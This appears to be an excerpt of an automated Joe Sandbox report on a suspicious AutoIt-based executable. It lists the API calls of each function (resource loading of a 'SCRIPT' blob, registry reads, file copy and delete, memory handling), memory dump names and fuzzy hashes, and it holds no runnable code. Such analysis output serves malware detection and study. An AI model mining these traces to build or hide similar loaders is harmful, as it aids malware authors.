                                                              Control-flow Graph

                                                              Control-flow graph for the function at 00434E89 (rendered graph with executed/not-executed colouring not reproduced). Nodes reference CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource and LockResource.
                                                              APIs
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00434D8E,?,?,00000000,00000000), ref: 00434E99
                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00434D8E,?,?,00000000,00000000), ref: 00434EB0
                                                              • LoadResource.KERNEL32(?,00000000,?,?,00434D8E,?,?,00000000,00000000,?,?,?,?,?,?,00434E2F), ref: 0046D937
                                                              • SizeofResource.KERNEL32(?,00000000,?,?,00434D8E,?,?,00000000,00000000,?,?,?,?,?,?,00434E2F), ref: 0046D94C
                                                              • LockResource.KERNEL32(00434D8E,?,?,00434D8E,?,?,00000000,00000000,?,?,?,?,?,?,00434E2F,00000000), ref: 0046D95F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                              • String ID: SCRIPT
                                                              • API String ID: 3051347437-3967369404
                                                              • Opcode ID: 595d754d8783406d79fdcf7a50e3cf413845b8c6b575e8937f3d0be937ecb9b9
                                                              • Instruction ID: e5beebecaab1b45ec31f6b02a7f61cdfdc66dedf0f784a1ec72759cb478a5677
                                                              • Opcode Fuzzy Hash: 595d754d8783406d79fdcf7a50e3cf413845b8c6b575e8937f3d0be937ecb9b9
                                                              • Instruction Fuzzy Hash: 7C115E75240700BFD7258B65EC49F677BBAFBC9B12F204279F409D6250DB61EC048665
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: pbO$%L
                                                              • API String ID: 3964851224-529566928
                                                              • Opcode ID: f10f8e41d52a6c10c91f82d42a3d6359e67b1eef7bbe4126e6891630d11b5439
                                                              • Instruction ID: eddd68665aca6b03fe9dc150d960ae3151f5c9fa24aca202cec267b285923c74
                                                              • Opcode Fuzzy Hash: f10f8e41d52a6c10c91f82d42a3d6359e67b1eef7bbe4126e6891630d11b5439
                                                              • Instruction Fuzzy Hash: 00929D746083418FD720DF24C480B6BB7E1BF89304F15896EE98A8B352D779EC55CB9A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DdO$DdO$DdO$DdO$Variable must be of type 'Object'.
                                                              • API String ID: 0-3753932206
                                                              • Opcode ID: bf604d8f60eb41c4a81cc4d3cdf371b0a50bb4000ebf8e90b21437e72fb98c49
                                                              • Instruction ID: ecd94180f3dd0fa48069be316de8db93c9861611fc32c459ec4af120ce1e95e6
                                                              • Opcode Fuzzy Hash: bf604d8f60eb41c4a81cc4d3cdf371b0a50bb4000ebf8e90b21437e72fb98c49
                                                              • Instruction Fuzzy Hash: 21A2AF74A01205CFCB24DF5AC480AAEB7B1FF58314F25906BE905AB391D739ED42CB99
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,0046E398), ref: 0049446A
                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 0049447B
                                                              • FindClose.KERNEL32(00000000), ref: 0049448B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: FileFind$AttributesCloseFirst
                                                              • String ID:
                                                              • API String ID: 48322524-0
                                                              • Opcode ID: 6191dbfa0692489dc8655b93bac99d5aa7e6cb6b4eb00174c0bf0de80a71e23e
                                                              • Instruction ID: 4495b08c62dc998e64bab6951bd6f27a4c62454f7ff470b5dbf300275a26c849
                                                              • Opcode Fuzzy Hash: 6191dbfa0692489dc8655b93bac99d5aa7e6cb6b4eb00174c0bf0de80a71e23e
                                                              • Instruction Fuzzy Hash: 4AE0D832410500674614AB78EC0D8EA7B9C9E45335F100776FC39C11D0E7785905959E
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00440A5B
                                                              • timeGetTime.WINMM ref: 00440D16
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00440E53
                                                              • Sleep.KERNEL32(0000000A), ref: 00440E61
                                                              • LockWindowUpdate.USER32(00000000,?,?), ref: 00440EFA
                                                              • DestroyWindow.USER32 ref: 00440F06
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00440F20
                                                              • Sleep.KERNEL32(0000000A,?,?), ref: 00474E83
                                                              • TranslateMessage.USER32(?), ref: 00475C60
                                                              • DispatchMessageW.USER32(?), ref: 00475C6E
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00475C82
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbO$pbO$pbO$pbO
                                                              • API String ID: 4212290369-442891389
                                                              • Opcode ID: 495029d5131f31ad34cbbe535ce8487d3abf3d7615e07785d0cef0db0d4663bc
                                                              • Instruction ID: b46cb7ef234b6ad573a81df93f563271d8dbb332f0387a95d7ad7de89852f9ed
                                                              • Opcode Fuzzy Hash: 495029d5131f31ad34cbbe535ce8487d3abf3d7615e07785d0cef0db0d4663bc
                                                              • Instruction Fuzzy Hash: E2B2A370608741DFD724DF24C885BAAB7E4BF84304F14892FE54D9B2A1C7B9E855CB8A

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00498F5F: __time64.LIBCMT ref: 00498F69
                                                                • Part of subcall function 00434EE5: _fseek.LIBCMT ref: 00434EFD
                                                              • __wsplitpath.LIBCMT ref: 00499234
                                                                • Part of subcall function 004540FB: __wsplitpath_helper.LIBCMT ref: 0045413B
                                                              • _wcscpy.LIBCMT ref: 00499247
                                                              • _wcscat.LIBCMT ref: 0049925A
                                                              • __wsplitpath.LIBCMT ref: 0049927F
                                                              • _wcscat.LIBCMT ref: 00499295
                                                              • _wcscat.LIBCMT ref: 004992A8
                                                                • Part of subcall function 00498FA5: _memmove.LIBCMT ref: 00498FDE
                                                                • Part of subcall function 00498FA5: _memmove.LIBCMT ref: 00498FED
                                                              • _wcscmp.LIBCMT ref: 004991EF
                                                                • Part of subcall function 00499734: _wcscmp.LIBCMT ref: 00499824
                                                                • Part of subcall function 00499734: _wcscmp.LIBCMT ref: 00499837
                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00499452
                                                              • _wcsncpy.LIBCMT ref: 004994C5
                                                              • DeleteFileW.KERNEL32(?,?), ref: 004994FB
                                                              • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00499511
                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00499522
                                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00499534
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                              • String ID:
                                                              • API String ID: 1500180987-0
                                                              • Opcode ID: 0cae97fe31b6b839396d8498f11c46e5d892fb0ddb46f5c89bba4e25b8bf2d43
                                                              • Instruction ID: 5b1ad0255ef311961927bb43edc1ac0126f407b63f101533955e2eb12c04584a
                                                              • Opcode Fuzzy Hash: 0cae97fe31b6b839396d8498f11c46e5d892fb0ddb46f5c89bba4e25b8bf2d43
                                                              • Instruction Fuzzy Hash: 5EC14FB1D00219ABDF11DF95CC85ADEBBB8EF49314F0040ABF609E6141DB349E448F69

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00433074
                                                              • RegisterClassExW.USER32(00000030), ref: 0043309E
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004330AF
                                                              • InitCommonControlsEx.COMCTL32(?), ref: 004330CC
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004330DC
                                                              • LoadIconW.USER32(000000A9), ref: 004330F2
                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00433101
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                              • API String ID: 2914291525-1005189915
                                                              • Opcode ID: 807c4d888c9f6e1e84f07b5e0a7873e895a4a998b382bbf671b8326816f60460
                                                              • Instruction ID: 0d33cec71e7d395dc7959dbbce282e4fe3d693ab43bf20869e17996868c8262a
                                                              • Opcode Fuzzy Hash: 807c4d888c9f6e1e84f07b5e0a7873e895a4a998b382bbf671b8326816f60460
                                                              • Instruction Fuzzy Hash: F0315871805348AFDB10DFA4EC84AEABFF4FB09310F1442AEE584E62A1D7B50565CF99

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00433074
                                                              • RegisterClassExW.USER32(00000030), ref: 0043309E
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004330AF
                                                              • InitCommonControlsEx.COMCTL32(?), ref: 004330CC
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004330DC
                                                              • LoadIconW.USER32(000000A9), ref: 004330F2
                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00433101
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                              • API String ID: 2914291525-1005189915
                                                              • Opcode ID: 86b9bc8b144f8a9b3923a93e29c2db4410a18c2b66e17fa730d282c3f823bd9b
                                                              • Instruction ID: 1732837aa14026671a25cf4894b9707b70cc6691c6fc46b2a0aac02e6b762c7a
                                                              • Opcode Fuzzy Hash: 86b9bc8b144f8a9b3923a93e29c2db4410a18c2b66e17fa730d282c3f823bd9b
                                                              • Instruction Fuzzy Hash: 5821F9B1910618AFDB00EF94EC48BDDBBF4FB08710F10427AF614A62A0D7B54564CFA9

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00434706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004F52F8,?,004337AE,?), ref: 00434724
                                                                • Part of subcall function 0045050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00437165), ref: 0045052D
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004371A8
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0046E8C8
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0046E909
                                                              • RegCloseKey.ADVAPI32(?), ref: 0046E947
                                                              • _wcscat.LIBCMT ref: 0046E9A0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                              • API String ID: 2673923337-2727554177
                                                              • Opcode ID: 3876edb0ef78c02bf5506ad9ebeb714d78355be61910c22d7c4785f242b4577a
                                                              • Instruction ID: 9d61f5cc8490c0f0252218b90ece18ce06f629e4d2c2607ba00ce7deb0856a77
                                                              • Opcode Fuzzy Hash: 3876edb0ef78c02bf5506ad9ebeb714d78355be61910c22d7c4785f242b4577a
                                                              • Instruction Fuzzy Hash: AC716EB15083019EC310EF2AEC419ABBBE8FF58314F42453FF485872A1EB759948CB5A

                                                              Control-flow Graph

                                                              APIs
                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 004336D2
                                                              • KillTimer.USER32(?,00000001), ref: 004336FC
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0043371F
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0043372A
                                                              • CreatePopupMenu.USER32 ref: 0043373E
                                                              • PostQuitMessage.USER32(00000000), ref: 0043374D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                              • String ID: TaskbarCreated$%L
                                                              • API String ID: 129472671-928395405
                                                              • Opcode ID: 03b2d50b9c0327c5d05fee9e5f5b21530a941353bfb529305d0745d74df9d05d
                                                              • Instruction ID: 6222010d553096697b79701babbc3ac5d0e23902ac4890275c8ce34cc246111b
                                                              • Opcode Fuzzy Hash: 03b2d50b9c0327c5d05fee9e5f5b21530a941353bfb529305d0745d74df9d05d
                                                              • Instruction Fuzzy Hash: E6411BB1A00505BFDB246F78DC0AB7A3B54E708342F10523BF601963A1DB6C9E65976E

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00433A50
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00433A5F
                                                              • LoadIconW.USER32(00000063), ref: 00433A76
                                                              • LoadIconW.USER32(000000A4), ref: 00433A88
                                                              • LoadIconW.USER32(000000A2), ref: 00433A9A
                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00433AC0
                                                              • RegisterClassExW.USER32(?), ref: 00433B16
                                                                • Part of subcall function 00433041: GetSysColorBrush.USER32(0000000F), ref: 00433074
                                                                • Part of subcall function 00433041: RegisterClassExW.USER32(00000030), ref: 0043309E
                                                                • Part of subcall function 00433041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004330AF
                                                                • Part of subcall function 00433041: InitCommonControlsEx.COMCTL32(?), ref: 004330CC
                                                                • Part of subcall function 00433041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004330DC
                                                                • Part of subcall function 00433041: LoadIconW.USER32(000000A9), ref: 004330F2
                                                                • Part of subcall function 00433041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00433101
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                              • String ID: #$0$AutoIt v3
                                                              • API String ID: 423443420-4155596026
                                                              • Opcode ID: ebc0d9cf38fd9959ade260f377e600ef81beda1e0fbe46c91e57aa527d15d8f6
                                                              • Instruction ID: 7e6b806a180d9ec01bef45fcd37491090d89392b3924435fcb9c426f75ced8cf
                                                              • Opcode Fuzzy Hash: ebc0d9cf38fd9959ade260f377e600ef81beda1e0fbe46c91e57aa527d15d8f6
                                                              • Instruction Fuzzy Hash: B3214B74D00704AFEB10DFA4EC09BAD7FB0FB08725F1142BAE604A62A1D7B55664CF98

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RO
                                                              • API String ID: 1825951767-1941922701
                                                              • Opcode ID: 6ae9de59f149a1e55c591a99dbe189a70f88ba152736c7b8ea19090351df6cff
                                                              • Instruction ID: 7dd5fe227b8beb4ee2597658067fcee7e5ed6e6896fa75398501987325c71428
                                                              • Opcode Fuzzy Hash: 6ae9de59f149a1e55c591a99dbe189a70f88ba152736c7b8ea19090351df6cff
                                                              • Instruction Fuzzy Hash: F5A16B71D0021DAACB04EFA5DC92AEEB778BF19305F00152FF415A7191EF786A08CB69

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00450162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00450193
                                                                • Part of subcall function 00450162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0045019B
                                                                • Part of subcall function 00450162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004501A6
                                                                • Part of subcall function 00450162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004501B1
                                                                • Part of subcall function 00450162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004501B9
                                                                • Part of subcall function 00450162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004501C1
                                                                • Part of subcall function 004460F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0043F930), ref: 00446154
                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0043F9CD
                                                              • OleInitialize.OLE32(00000000), ref: 0043FA4A
                                                              • CloseHandle.KERNEL32(00000000), ref: 004745C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                              • String ID: <WO$\TO$%L$SO
                                                              • API String ID: 1986988660-3744586639
                                                              • Opcode ID: 8b226273d88f2e68c6709d06bc4bf425ea532b7612d50aa5b2155952f3c4f22b
                                                              • Instruction ID: 7fe029b97eeea0af872e1f784dd930d818ed35070a2e202a9a5b93ed50041eb6
                                                              • Opcode Fuzzy Hash: 8b226273d88f2e68c6709d06bc4bf425ea532b7612d50aa5b2155952f3c4f22b
                                                              • Instruction Fuzzy Hash: 6C81ABB0901E409FD384EF2AA9457397BE5EB8830AB51813F9719CB272E77844A4CF1D

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01F926B1
                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01F928D7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2137747443.0000000001F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1f90000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CreateFileFreeVirtual
                                                              • String ID:
                                                              • API String ID: 204039940-0
                                                              • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                              • Instruction ID: e2f8f5ee6c562f6b314670df0f977375a2bd377a2823a3ee9d04747beca891d8
                                                              • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                              • Instruction Fuzzy Hash: F2A1F675E00209EBEF14DFA4C994BEEBBB5BF48304F208159E601BB281D7769A41CF95

                                                              Control-flow Graph

                                                              [Graph image not reproduced: single basic block 4339d5-433a45 calling CreateWindowExW twice and ShowWindow twice]
                                                              APIs
                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00433A03
                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00433A24
                                                              • ShowWindow.USER32(00000000,?,?), ref: 00433A38
                                                              • ShowWindow.USER32(00000000,?,?), ref: 00433A41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
